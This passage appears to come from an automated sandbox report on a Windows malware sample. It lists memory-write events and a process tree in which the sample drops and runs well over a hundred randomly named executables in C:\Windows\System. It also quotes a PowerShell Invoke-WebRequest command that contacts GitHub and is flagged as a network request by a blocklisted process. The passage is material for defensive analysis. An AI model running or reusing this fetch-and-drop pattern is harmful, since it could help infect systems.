PID 3516 wrote to memory of 2220	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	102
PID 3516 wrote to memory of 2700	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	103
PID 3516 wrote to memory of 2700	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	103
PID 3516 wrote to memory of 1996	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	104
PID 3516 wrote to memory of 1996	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	104
PID 3516 wrote to memory of 2016	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	105
PID 3516 wrote to memory of 2016	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	105
PID 3516 wrote to memory of 908	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	106
PID 3516 wrote to memory of 908	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	106
PID 3516 wrote to memory of 468	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	107
PID 3516 wrote to memory of 468	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	107
PID 3516 wrote to memory of 968	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	108
PID 3516 wrote to memory of 968	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	108
PID 3516 wrote to memory of 5072	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	109
PID 3516 wrote to memory of 5072	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	109
PID 3516 wrote to memory of 1088	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	110
PID 3516 wrote to memory of 1088	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	110
PID 3516 wrote to memory of 4864	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	111
PID 3516 wrote to memory of 4864	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	111
PID 3516 wrote to memory of 3804	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	112
PID 3516 wrote to memory of 3804	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	112
PID 3516 wrote to memory of 5096	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	113
PID 3516 wrote to memory of 5096	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	113
PID 3516 wrote to memory of 1800	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	114
PID 3516 wrote to memory of 1800	3516	54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\System\adqWZsQ.exe
  C:\Windows\System\adqWZsQ.exe
  2⤵
  - Executes dropped EXE
  PID:336
- C:\Windows\System\ABcQfpg.exe
  C:\Windows\System\ABcQfpg.exe
  2⤵
  - Executes dropped EXE
  PID:2748
- C:\Windows\System\GpAWmFJ.exe
  C:\Windows\System\GpAWmFJ.exe
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Windows\System\iGLCaTJ.exe
  C:\Windows\System\iGLCaTJ.exe
  2⤵
  - Executes dropped EXE
  PID:1836
- C:\Windows\System\GrhuIBv.exe
  C:\Windows\System\GrhuIBv.exe
  2⤵
  - Executes dropped EXE
  PID:2316
- C:\Windows\System\htpxduv.exe
  C:\Windows\System\htpxduv.exe
  2⤵
  - Executes dropped EXE
  PID:2088
- C:\Windows\System\geeHHDE.exe
  C:\Windows\System\geeHHDE.exe
  2⤵
  - Executes dropped EXE
  PID:3552
- C:\Windows\System\HybSgSu.exe
  C:\Windows\System\HybSgSu.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\FNClqkh.exe
  C:\Windows\System\FNClqkh.exe
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\Windows\System\jvcspfu.exe
  C:\Windows\System\jvcspfu.exe
  2⤵
  - Executes dropped EXE
  PID:4044
- C:\Windows\System\OHkNcXJ.exe
  C:\Windows\System\OHkNcXJ.exe
  2⤵
  - Executes dropped EXE
  PID:1068
- C:\Windows\System\riITcaF.exe
  C:\Windows\System\riITcaF.exe
  2⤵
  - Executes dropped EXE
  PID:2036
- C:\Windows\System\rdeGiIr.exe
  C:\Windows\System\rdeGiIr.exe
  2⤵
  - Executes dropped EXE
  PID:2120
- C:\Windows\System\yqHZBEx.exe
  C:\Windows\System\yqHZBEx.exe
  2⤵
  - Executes dropped EXE
  PID:1136
- C:\Windows\System\kPyreuc.exe
  C:\Windows\System\kPyreuc.exe
  2⤵
  - Executes dropped EXE
  PID:4308
- C:\Windows\System\OWiIfbG.exe
  C:\Windows\System\OWiIfbG.exe
  2⤵
  - Executes dropped EXE
  PID:3140
- C:\Windows\System\jkiMEsC.exe
  C:\Windows\System\jkiMEsC.exe
  2⤵
  - Executes dropped EXE
  PID:4316
- C:\Windows\System\vRtcyzq.exe
  C:\Windows\System\vRtcyzq.exe
  2⤵
  - Executes dropped EXE
  PID:3316
- C:\Windows\System\pmbhwOm.exe
  C:\Windows\System\pmbhwOm.exe
  2⤵
  - Executes dropped EXE
  PID:2220
- C:\Windows\System\YsvWNXz.exe
  C:\Windows\System\YsvWNXz.exe
  2⤵
  - Executes dropped EXE
  PID:2700
- C:\Windows\System\IBlciVz.exe
  C:\Windows\System\IBlciVz.exe
  2⤵
  - Executes dropped EXE
  PID:1996
- C:\Windows\System\rAGuyUF.exe
  C:\Windows\System\rAGuyUF.exe
  2⤵
  - Executes dropped EXE
  PID:2016
- C:\Windows\System\lSPeVxw.exe
  C:\Windows\System\lSPeVxw.exe
  2⤵
  - Executes dropped EXE
  PID:908
- C:\Windows\System\YNmjZJq.exe
  C:\Windows\System\YNmjZJq.exe
  2⤵
  - Executes dropped EXE
  PID:468
- C:\Windows\System\FFBkVQO.exe
  C:\Windows\System\FFBkVQO.exe
  2⤵
  - Executes dropped EXE
  PID:968
- C:\Windows\System\JfnvvZI.exe
  C:\Windows\System\JfnvvZI.exe
  2⤵
  - Executes dropped EXE
  PID:5072
- C:\Windows\System\CqHHiwc.exe
  C:\Windows\System\CqHHiwc.exe
  2⤵
  - Executes dropped EXE
  PID:1088
- C:\Windows\System\ulpKdti.exe
  C:\Windows\System\ulpKdti.exe
  2⤵
  - Executes dropped EXE
  PID:4864
- C:\Windows\System\AegnXVD.exe
  C:\Windows\System\AegnXVD.exe
  2⤵
  - Executes dropped EXE
  PID:3804
- C:\Windows\System\CLQDDnS.exe
  C:\Windows\System\CLQDDnS.exe
  2⤵
  - Executes dropped EXE
  PID:5096
- C:\Windows\System\wBhDzYR.exe
  C:\Windows\System\wBhDzYR.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\YpVAgfL.exe
  C:\Windows\System\YpVAgfL.exe
  2⤵
  - Executes dropped EXE
  PID:2560
- C:\Windows\System\wtHCFmP.exe
  C:\Windows\System\wtHCFmP.exe
  2⤵
  - Executes dropped EXE
  PID:2308
- C:\Windows\System\YqcpDnO.exe
  C:\Windows\System\YqcpDnO.exe
  2⤵
  - Executes dropped EXE
  PID:4360
- C:\Windows\System\EbpPsAl.exe
  C:\Windows\System\EbpPsAl.exe
  2⤵
  - Executes dropped EXE
  PID:5048
- C:\Windows\System\KiPFIce.exe
  C:\Windows\System\KiPFIce.exe
  2⤵
  - Executes dropped EXE
  PID:3672
- C:\Windows\System\GZGoQRy.exe
  C:\Windows\System\GZGoQRy.exe
  2⤵
  - Executes dropped EXE
  PID:3372
- C:\Windows\System\NgPaMyk.exe
  C:\Windows\System\NgPaMyk.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\ZdnTTwP.exe
  C:\Windows\System\ZdnTTwP.exe
  2⤵
  - Executes dropped EXE
  PID:224
- C:\Windows\System\tcgmmEg.exe
  C:\Windows\System\tcgmmEg.exe
  2⤵
  - Executes dropped EXE
  PID:988
- C:\Windows\System\dyABklh.exe
  C:\Windows\System\dyABklh.exe
  2⤵
  - Executes dropped EXE
  PID:396
- C:\Windows\System\AsQIDlR.exe
  C:\Windows\System\AsQIDlR.exe
  2⤵
  - Executes dropped EXE
  PID:1220
- C:\Windows\System\khfsTLA.exe
  C:\Windows\System\khfsTLA.exe
  2⤵
  - Executes dropped EXE
  PID:1028
- C:\Windows\System\ORSdHEk.exe
  C:\Windows\System\ORSdHEk.exe
  2⤵
  - Executes dropped EXE
  PID:1184
- C:\Windows\System\YqmtDrq.exe
  C:\Windows\System\YqmtDrq.exe
  2⤵
  - Executes dropped EXE
  PID:876
- C:\Windows\System\SbICzMf.exe
  C:\Windows\System\SbICzMf.exe
  2⤵
  - Executes dropped EXE
  PID:4812
- C:\Windows\System\XaWuOYF.exe
  C:\Windows\System\XaWuOYF.exe
  2⤵
  - Executes dropped EXE
  PID:4024
- C:\Windows\System\aKywbfD.exe
  C:\Windows\System\aKywbfD.exe
  2⤵
  - Executes dropped EXE
  PID:4908
- C:\Windows\System\wckvcBC.exe
  C:\Windows\System\wckvcBC.exe
  2⤵
  - Executes dropped EXE
  PID:4952
- C:\Windows\System\YygCuwW.exe
  C:\Windows\System\YygCuwW.exe
  2⤵
  - Executes dropped EXE
  PID:4348
- C:\Windows\System\sgtDsth.exe
  C:\Windows\System\sgtDsth.exe
  2⤵
  - Executes dropped EXE
  PID:3868
- C:\Windows\System\EixKwRx.exe
  C:\Windows\System\EixKwRx.exe
  2⤵
  - Executes dropped EXE
  PID:4184
- C:\Windows\System\pWcCsYK.exe
  C:\Windows\System\pWcCsYK.exe
  2⤵
  - Executes dropped EXE
  PID:544
- C:\Windows\System\CTKPpxx.exe
  C:\Windows\System\CTKPpxx.exe
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Windows\System\IWFuQSx.exe
  C:\Windows\System\IWFuQSx.exe
  2⤵
  - Executes dropped EXE
  PID:924
- C:\Windows\System\ugkNrGW.exe
  C:\Windows\System\ugkNrGW.exe
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Windows\System\mGVviYi.exe
  C:\Windows\System\mGVviYi.exe
  2⤵
  - Executes dropped EXE
  PID:4656
- C:\Windows\System\XGTHtwB.exe
  C:\Windows\System\XGTHtwB.exe
  2⤵
  - Executes dropped EXE
  PID:456
- C:\Windows\System\pXeROyR.exe
  C:\Windows\System\pXeROyR.exe
  2⤵
  - Executes dropped EXE
  PID:5028
- C:\Windows\System\BgVvwyd.exe
  C:\Windows\System\BgVvwyd.exe
  2⤵
  - Executes dropped EXE
  PID:1552
- C:\Windows\System\lIcrtgP.exe
  C:\Windows\System\lIcrtgP.exe
  2⤵
  - Executes dropped EXE
  PID:4900
- C:\Windows\System\IxhtLou.exe
  C:\Windows\System\IxhtLou.exe
  2⤵
  - Executes dropped EXE
  PID:4692
- C:\Windows\System\Kpzurvq.exe
  C:\Windows\System\Kpzurvq.exe
  2⤵
  - Executes dropped EXE
  PID:3492
- C:\Windows\System\qUWpulk.exe
  C:\Windows\System\qUWpulk.exe
  2⤵
  - Executes dropped EXE
  PID:5076
- C:\Windows\System\WbomVcX.exe
  C:\Windows\System\WbomVcX.exe
  2⤵
  PID:1176
- C:\Windows\System\NIggMtY.exe
  C:\Windows\System\NIggMtY.exe
  2⤵
  PID:1244
- C:\Windows\System\GVeGErd.exe
  C:\Windows\System\GVeGErd.exe
  2⤵
  PID:3320
- C:\Windows\System\ySOBbKU.exe
  C:\Windows\System\ySOBbKU.exe
  2⤵
  PID:1916
- C:\Windows\System\FXLsQAR.exe
  C:\Windows\System\FXLsQAR.exe
  2⤵
  PID:4040
- C:\Windows\System\VppIgkQ.exe
  C:\Windows\System\VppIgkQ.exe
  2⤵
  PID:5136
- C:\Windows\System\uJfKkNN.exe
  C:\Windows\System\uJfKkNN.exe
  2⤵
  PID:5168
- C:\Windows\System\eqAYfQo.exe
  C:\Windows\System\eqAYfQo.exe
  2⤵
  PID:5196
- C:\Windows\System\YEHbaZS.exe
  C:\Windows\System\YEHbaZS.exe
  2⤵
  PID:5244
- C:\Windows\System\wztATzO.exe
  C:\Windows\System\wztATzO.exe
  2⤵
  PID:5272
- C:\Windows\System\fbNFXtb.exe
  C:\Windows\System\fbNFXtb.exe
  2⤵
  PID:5304
- C:\Windows\System\YufQemr.exe
  C:\Windows\System\YufQemr.exe
  2⤵
  PID:5356
- C:\Windows\System\SVejvyZ.exe
  C:\Windows\System\SVejvyZ.exe
  2⤵
  PID:5384
- C:\Windows\System\YryJaDG.exe
  C:\Windows\System\YryJaDG.exe
  2⤵
  PID:5408
- C:\Windows\System\TBdfBqd.exe
  C:\Windows\System\TBdfBqd.exe
  2⤵
  PID:5460
- C:\Windows\System\vdksRXr.exe
  C:\Windows\System\vdksRXr.exe
  2⤵
  PID:5492
- C:\Windows\System\kRIJbaH.exe
  C:\Windows\System\kRIJbaH.exe
  2⤵
  PID:5520
- C:\Windows\System\DKaxZvg.exe
  C:\Windows\System\DKaxZvg.exe
  2⤵
  PID:5572
- C:\Windows\System\xeZjPqC.exe
  C:\Windows\System\xeZjPqC.exe
  2⤵
  PID:5600
- C:\Windows\System\bNQRKXR.exe
  C:\Windows\System\bNQRKXR.exe
  2⤵
  PID:5628
- C:\Windows\System\TmoRIcq.exe
  C:\Windows\System\TmoRIcq.exe
  2⤵
  PID:5680
- C:\Windows\System\kQXjrNb.exe
  C:\Windows\System\kQXjrNb.exe
  2⤵
  PID:5708
- C:\Windows\System\pWjIJCA.exe
  C:\Windows\System\pWjIJCA.exe
  2⤵
  PID:5732
- C:\Windows\System\wEJyXIS.exe
  C:\Windows\System\wEJyXIS.exe
  2⤵
  PID:5788
- C:\Windows\System\Stomrch.exe
  C:\Windows\System\Stomrch.exe
  2⤵
  PID:5816
- C:\Windows\System\pmaFPOe.exe
  C:\Windows\System\pmaFPOe.exe
  2⤵
  PID:5840
- C:\Windows\System\GOTwFQs.exe
  C:\Windows\System\GOTwFQs.exe
  2⤵
  PID:5896
- C:\Windows\System\RfKuWEe.exe
  C:\Windows\System\RfKuWEe.exe
  2⤵
  PID:5912
- C:\Windows\System\hsygyIH.exe
  C:\Windows\System\hsygyIH.exe
  2⤵
  PID:5948
- C:\Windows\System\GlsKsdt.exe
  C:\Windows\System\GlsKsdt.exe
  2⤵
  PID:6000
- C:\Windows\System\xQQdQfD.exe
  C:\Windows\System\xQQdQfD.exe
  2⤵
  PID:6028
- C:\Windows\System\fUTbgnV.exe
  C:\Windows\System\fUTbgnV.exe
  2⤵
  PID:6080
- C:\Windows\System\oAcjXUH.exe
  C:\Windows\System\oAcjXUH.exe
  2⤵
  PID:6108
- C:\Windows\System\XsMMrmf.exe
  C:\Windows\System\XsMMrmf.exe
  2⤵
  PID:6136
- C:\Windows\System\WVkmBWG.exe
  C:\Windows\System\WVkmBWG.exe
  2⤵
  PID:1112
- C:\Windows\System\abVGLWq.exe
  C:\Windows\System\abVGLWq.exe
  2⤵
  PID:2988
- C:\Windows\System\wmfvNiM.exe
  C:\Windows\System\wmfvNiM.exe
  2⤵
  PID:3328
- C:\Windows\System\hWDOswN.exe
  C:\Windows\System\hWDOswN.exe
  2⤵
  PID:5132
- C:\Windows\System\yzeKwan.exe
  C:\Windows\System\yzeKwan.exe
  2⤵
  PID:5212
- C:\Windows\System\NTasjKH.exe
  C:\Windows\System\NTasjKH.exe
  2⤵
  PID:5296
- C:\Windows\System\fZiXDCs.exe
  C:\Windows\System\fZiXDCs.exe
  2⤵
  PID:5340
- C:\Windows\System\JwTVplg.exe
  C:\Windows\System\JwTVplg.exe
  2⤵
  PID:5396
- C:\Windows\System\ROTxUSR.exe
  C:\Windows\System\ROTxUSR.exe
  2⤵
  PID:5456
- C:\Windows\System\NVvuJYs.exe
  C:\Windows\System\NVvuJYs.exe
  2⤵
  PID:5508
- C:\Windows\System\hAOQjkp.exe
  C:\Windows\System\hAOQjkp.exe
  2⤵
  PID:5564
- C:\Windows\System\jTkCwHv.exe
  C:\Windows\System\jTkCwHv.exe
  2⤵
  PID:5644
- C:\Windows\System\XiRQbHT.exe
  C:\Windows\System\XiRQbHT.exe
  2⤵
  PID:5728
- C:\Windows\System\vRPdKBM.exe
  C:\Windows\System\vRPdKBM.exe
  2⤵
  PID:5776
- C:\Windows\System\mfaLsqH.exe
  C:\Windows\System\mfaLsqH.exe
  2⤵
  PID:5860
- C:\Windows\System\VSOygjJ.exe
  C:\Windows\System\VSOygjJ.exe
  2⤵
  PID:668
- C:\Windows\System\avUZlxz.exe
  C:\Windows\System\avUZlxz.exe
  2⤵
  PID:5968
- C:\Windows\System\lJWXXTL.exe
  C:\Windows\System\lJWXXTL.exe
  2⤵
  PID:5992
- C:\Windows\System\EEFZLoI.exe
  C:\Windows\System\EEFZLoI.exe
  2⤵
  PID:3224
- C:\Windows\System\wRyVcgr.exe
  C:\Windows\System\wRyVcgr.exe
  2⤵
  PID:3452
- C:\Windows\System\sWRAsgr.exe
  C:\Windows\System\sWRAsgr.exe
  2⤵
  PID:3240
- C:\Windows\System\YNbLsFb.exe
  C:\Windows\System\YNbLsFb.exe
  2⤵
  PID:2168
- C:\Windows\System\SBxAtkc.exe
  C:\Windows\System\SBxAtkc.exe
  2⤵
  PID:5188
- C:\Windows\System\TqlKaqX.exe
  C:\Windows\System\TqlKaqX.exe
  2⤵
  PID:5324
- C:\Windows\System\tjEXKLd.exe
  C:\Windows\System\tjEXKLd.exe
  2⤵
  PID:1192
- C:\Windows\System\jFQQqxE.exe
  C:\Windows\System\jFQQqxE.exe
  2⤵
  PID:5436
- C:\Windows\System\EYdnfFJ.exe
  C:\Windows\System\EYdnfFJ.exe
  2⤵
  PID:2652
- C:\Windows\System\gTuogPg.exe
  C:\Windows\System\gTuogPg.exe
  2⤵
  PID:5660
- C:\Windows\System\wVtCpgA.exe
  C:\Windows\System\wVtCpgA.exe
  2⤵
  PID:5804
- C:\Windows\System\IJTNHjB.exe
  C:\Windows\System\IJTNHjB.exe
  2⤵
  PID:5428
- C:\Windows\System\vTYdlRo.exe
  C:\Windows\System\vTYdlRo.exe
  2⤵
  PID:5544
- C:\Windows\System\WNYPnDb.exe
  C:\Windows\System\WNYPnDb.exe
  2⤵
  PID:5672
- C:\Windows\System\SmiFcAE.exe
  C:\Windows\System\SmiFcAE.exe
  2⤵
  PID:6064
- C:\Windows\System\HEUwMbT.exe
  C:\Windows\System\HEUwMbT.exe
  2⤵
  PID:1032
- C:\Windows\System\DpKsOCS.exe
  C:\Windows\System\DpKsOCS.exe
  2⤵
  PID:3544
- C:\Windows\System\WBFaWRi.exe
  C:\Windows\System\WBFaWRi.exe
  2⤵
  PID:1132
- C:\Windows\System\NXAuMcM.exe
  C:\Windows\System\NXAuMcM.exe
  2⤵
  PID:3788
- C:\Windows\System\ADnFLqt.exe
  C:\Windows\System\ADnFLqt.exe
  2⤵
  PID:5236
- C:\Windows\System\oqGxaOP.exe
  C:\Windows\System\oqGxaOP.exe
  2⤵
  PID:1268
- C:\Windows\System\ckureVM.exe
  C:\Windows\System\ckureVM.exe
  2⤵
  PID:5424
- C:\Windows\System\cJsbJSn.exe
  C:\Windows\System\cJsbJSn.exe
  2⤵
  PID:5612
- C:\Windows\System\yWZxQzF.exe
  C:\Windows\System\yWZxQzF.exe
  2⤵
  PID:6044
- C:\Windows\System\kJnhlKq.exe
  C:\Windows\System\kJnhlKq.exe
  2⤵
  PID:1420
- C:\Windows\System\EDLBUvQ.exe
  C:\Windows\System\EDLBUvQ.exe
  2⤵
  PID:3696
- C:\Windows\System\sDSrnwv.exe
  C:\Windows\System\sDSrnwv.exe
  2⤵
  PID:5184
- C:\Windows\System\ZYvuBPe.exe
  C:\Windows\System\ZYvuBPe.exe
  2⤵
  PID:5560
- C:\Windows\System\qyRnhtE.exe
  C:\Windows\System\qyRnhtE.exe
  2⤵
  PID:2212
- C:\Windows\System\GtvwvSI.exe
  C:\Windows\System\GtvwvSI.exe
  2⤵
  PID:3424
- C:\Windows\System\BzIYjyF.exe
  C:\Windows\System\BzIYjyF.exe
  2⤵
  PID:1276
- C:\Windows\System\sVtUPYc.exe
  C:\Windows\System\sVtUPYc.exe
  2⤵
  PID:5232
- C:\Windows\System\zRbtEVj.exe
  C:\Windows\System\zRbtEVj.exe
  2⤵
  PID:5936
- C:\Windows\System\PLjfIvh.exe
  C:\Windows\System\PLjfIvh.exe
  2⤵
  PID:4384
- C:\Windows\System\vFpnRkg.exe
  C:\Windows\System\vFpnRkg.exe
  2⤵
  PID:6168
- C:\Windows\System\MvtLOGA.exe
  C:\Windows\System\MvtLOGA.exe
  2⤵
  PID:6192
- C:\Windows\System\NIdfyRp.exe
  C:\Windows\System\NIdfyRp.exe
  2⤵
  PID:6236
- C:\Windows\System\JXeZear.exe
  C:\Windows\System\JXeZear.exe
  2⤵
  PID:6264
- C:\Windows\System\SybXuuv.exe
  C:\Windows\System\SybXuuv.exe
  2⤵
  PID:6292
- C:\Windows\System\GHOrTZa.exe
  C:\Windows\System\GHOrTZa.exe
  2⤵
  PID:6324
- C:\Windows\System\mvfjDBt.exe
  C:\Windows\System\mvfjDBt.exe
  2⤵
  PID:6356
- C:\Windows\System\gOjJYRd.exe
  C:\Windows\System\gOjJYRd.exe
  2⤵
  PID:6384
- C:\Windows\System\nJOHUXe.exe
  C:\Windows\System\nJOHUXe.exe
  2⤵
  PID:6412
- C:\Windows\System\ZNXxOCh.exe
  C:\Windows\System\ZNXxOCh.exe
  2⤵
  PID:6440
- C:\Windows\System\WWLRtzU.exe
  C:\Windows\System\WWLRtzU.exe
  2⤵
  PID:6472
- C:\Windows\System\yDNhBEj.exe
  C:\Windows\System\yDNhBEj.exe
  2⤵
  PID:6500
- C:\Windows\System\cZYToXX.exe
  C:\Windows\System\cZYToXX.exe
  2⤵
  PID:6524
- C:\Windows\System\pEKXOdx.exe
  C:\Windows\System\pEKXOdx.exe
  2⤵
  PID:6548
- C:\Windows\System\eIUEktY.exe
  C:\Windows\System\eIUEktY.exe
  2⤵
  PID:6576
- C:\Windows\System\HTKrFKW.exe
  C:\Windows\System\HTKrFKW.exe
  2⤵
  PID:6604
- C:\Windows\System\EVgdkNc.exe
  C:\Windows\System\EVgdkNc.exe
  2⤵
  PID:6644
- C:\Windows\System\dORvHMB.exe
  C:\Windows\System\dORvHMB.exe
  2⤵
  PID:6676
- C:\Windows\System\PbHiXUA.exe
  C:\Windows\System\PbHiXUA.exe
  2⤵
  PID:6724
- C:\Windows\System\iivENhe.exe
  C:\Windows\System\iivENhe.exe
  2⤵
  PID:6744
- C:\Windows\System\mYYLiMM.exe
  C:\Windows\System\mYYLiMM.exe
  2⤵
  PID:6788
- C:\Windows\System\zxecbGd.exe
  C:\Windows\System\zxecbGd.exe
  2⤵
  PID:6804
- C:\Windows\System\ZsTGJQA.exe
  C:\Windows\System\ZsTGJQA.exe
  2⤵
  PID:6832
- C:\Windows\System\CrTuFwT.exe
  C:\Windows\System\CrTuFwT.exe
  2⤵
  PID:6860
- C:\Windows\System\cNpSTXd.exe
  C:\Windows\System\cNpSTXd.exe
  2⤵
  PID:6896
- C:\Windows\System\YJNnnZi.exe
  C:\Windows\System\YJNnnZi.exe
  2⤵
  PID:6928
- C:\Windows\System\tNKykXA.exe
  C:\Windows\System\tNKykXA.exe
  2⤵
  PID:6956
- C:\Windows\System\mDHfNKm.exe
  C:\Windows\System\mDHfNKm.exe
  2⤵
  PID:6988
- C:\Windows\System\vzDtsNj.exe
  C:\Windows\System\vzDtsNj.exe
  2⤵
  PID:7012
- C:\Windows\System\ujdgaLG.exe
  C:\Windows\System\ujdgaLG.exe
  2⤵
  PID:7028
- C:\Windows\System\zHGBPLp.exe
  C:\Windows\System\zHGBPLp.exe
  2⤵
  PID:7044
- C:\Windows\System\MuNQKhu.exe
  C:\Windows\System\MuNQKhu.exe
  2⤵
  PID:7060
- C:\Windows\System\UkBHDmm.exe
  C:\Windows\System\UkBHDmm.exe
  2⤵
  PID:7092
- C:\Windows\System\ufLDSny.exe
  C:\Windows\System\ufLDSny.exe
  2⤵
  PID:7148
- C:\Windows\System\IcTezOi.exe
  C:\Windows\System\IcTezOi.exe
  2⤵
  PID:4344
- C:\Windows\System\yvDyCUn.exe
  C:\Windows\System\yvDyCUn.exe
  2⤵
  PID:6148
- C:\Windows\System\NIfQbnD.exe
  C:\Windows\System\NIfQbnD.exe
  2⤵
  PID:6252
- C:\Windows\System\bVZADyS.exe
  C:\Windows\System\bVZADyS.exe
  2⤵
  PID:6316
- C:\Windows\System\jybFjSh.exe
  C:\Windows\System\jybFjSh.exe
  2⤵
  PID:6368
- C:\Windows\System\BfOLIHO.exe
  C:\Windows\System\BfOLIHO.exe
  2⤵
  PID:6452
- C:\Windows\System\nwnCfnj.exe
  C:\Windows\System\nwnCfnj.exe
  2⤵
  PID:5288
- C:\Windows\System\mCNbtHB.exe
  C:\Windows\System\mCNbtHB.exe
  2⤵
  PID:6564
- C:\Windows\System\GvnBZDA.exe
  C:\Windows\System\GvnBZDA.exe
  2⤵
  PID:6664
- C:\Windows\System\vyCbggM.exe
  C:\Windows\System\vyCbggM.exe
  2⤵
  PID:6764
- C:\Windows\System\CMyBllG.exe
  C:\Windows\System\CMyBllG.exe
  2⤵
  PID:6820
- C:\Windows\System\DGEzQtY.exe
  C:\Windows\System\DGEzQtY.exe
  2⤵
  PID:6908
- C:\Windows\System\dztbiXC.exe
  C:\Windows\System\dztbiXC.exe
  2⤵
  PID:6972
- C:\Windows\System\lzqBUyQ.exe
  C:\Windows\System\lzqBUyQ.exe
  2⤵
  PID:7008
- C:\Windows\System\bIrRonH.exe
  C:\Windows\System\bIrRonH.exe
  2⤵
  PID:7084
- C:\Windows\System\eFejCrw.exe
  C:\Windows\System\eFejCrw.exe
  2⤵
  PID:7164
- C:\Windows\System\bssYpJW.exe
  C:\Windows\System\bssYpJW.exe
  2⤵
  PID:6284
- C:\Windows\System\JDZXfzx.exe
  C:\Windows\System\JDZXfzx.exe
  2⤵
  PID:6624
- C:\Windows\System\FXPnseS.exe
  C:\Windows\System\FXPnseS.exe
  2⤵
  PID:6816
- C:\Windows\System\TRGOiBU.exe
  C:\Windows\System\TRGOiBU.exe
  2⤵
  PID:6996
- C:\Windows\System\TTUSKqm.exe
  C:\Windows\System\TTUSKqm.exe
  2⤵
  PID:7124
- C:\Windows\System\lyvWgky.exe
  C:\Windows\System\lyvWgky.exe
  2⤵
  PID:6248
- C:\Windows\System\zciYRmt.exe
  C:\Windows\System\zciYRmt.exe
  2⤵
  PID:6884
- C:\Windows\System\KBnmrtw.exe
  C:\Windows\System\KBnmrtw.exe
  2⤵
  PID:6544
- C:\Windows\System\fJBdWRb.exe
  C:\Windows\System\fJBdWRb.exe
  2⤵
  PID:7184
- C:\Windows\System\EBiAyon.exe
  C:\Windows\System\EBiAyon.exe
  2⤵
  PID:7216
- C:\Windows\System\wJrjhFf.exe
  C:\Windows\System\wJrjhFf.exe
  2⤵
  PID:7244
- C:\Windows\System\HBHvfyL.exe
  C:\Windows\System\HBHvfyL.exe
  2⤵
  PID:7272
- C:\Windows\System\CAeKZaw.exe
  C:\Windows\System\CAeKZaw.exe
  2⤵
  PID:7288
- C:\Windows\System\bVdkwbs.exe
  C:\Windows\System\bVdkwbs.exe
  2⤵
  PID:7328
- C:\Windows\System\jzZZoHl.exe
  C:\Windows\System\jzZZoHl.exe
  2⤵
  PID:7360
- C:\Windows\System\QfBejwp.exe
  C:\Windows\System\QfBejwp.exe
  2⤵
  PID:7388
- C:\Windows\System\CeZQEbe.exe
  C:\Windows\System\CeZQEbe.exe
  2⤵
  PID:7404
- C:\Windows\System\QIvyyFa.exe
  C:\Windows\System\QIvyyFa.exe
  2⤵
  PID:7444
- C:\Windows\System\yoEIYMx.exe
  C:\Windows\System\yoEIYMx.exe
  2⤵
  PID:7472
- C:\Windows\System\BbMjwek.exe
  C:\Windows\System\BbMjwek.exe
  2⤵
  PID:7504
- C:\Windows\System\aLWwqxH.exe
  C:\Windows\System\aLWwqxH.exe
  2⤵
  PID:7536
- C:\Windows\System\QuAtEZK.exe
  C:\Windows\System\QuAtEZK.exe
  2⤵
  PID:7564
- C:\Windows\System\XCvdEch.exe
  C:\Windows\System\XCvdEch.exe
  2⤵
  PID:7592
- C:\Windows\System\vzvIhsc.exe
  C:\Windows\System\vzvIhsc.exe
  2⤵
  PID:7620
- C:\Windows\System\CjWSCUN.exe
  C:\Windows\System\CjWSCUN.exe
  2⤵
  PID:7636
- C:\Windows\System\svSMJlu.exe
  C:\Windows\System\svSMJlu.exe
  2⤵
  PID:7664
- C:\Windows\System\FFkKoiy.exe
  C:\Windows\System\FFkKoiy.exe
  2⤵
  PID:7704
- C:\Windows\System\VHNEIpa.exe
  C:\Windows\System\VHNEIpa.exe
  2⤵
  PID:7732
- C:\Windows\System\IrmfVjn.exe
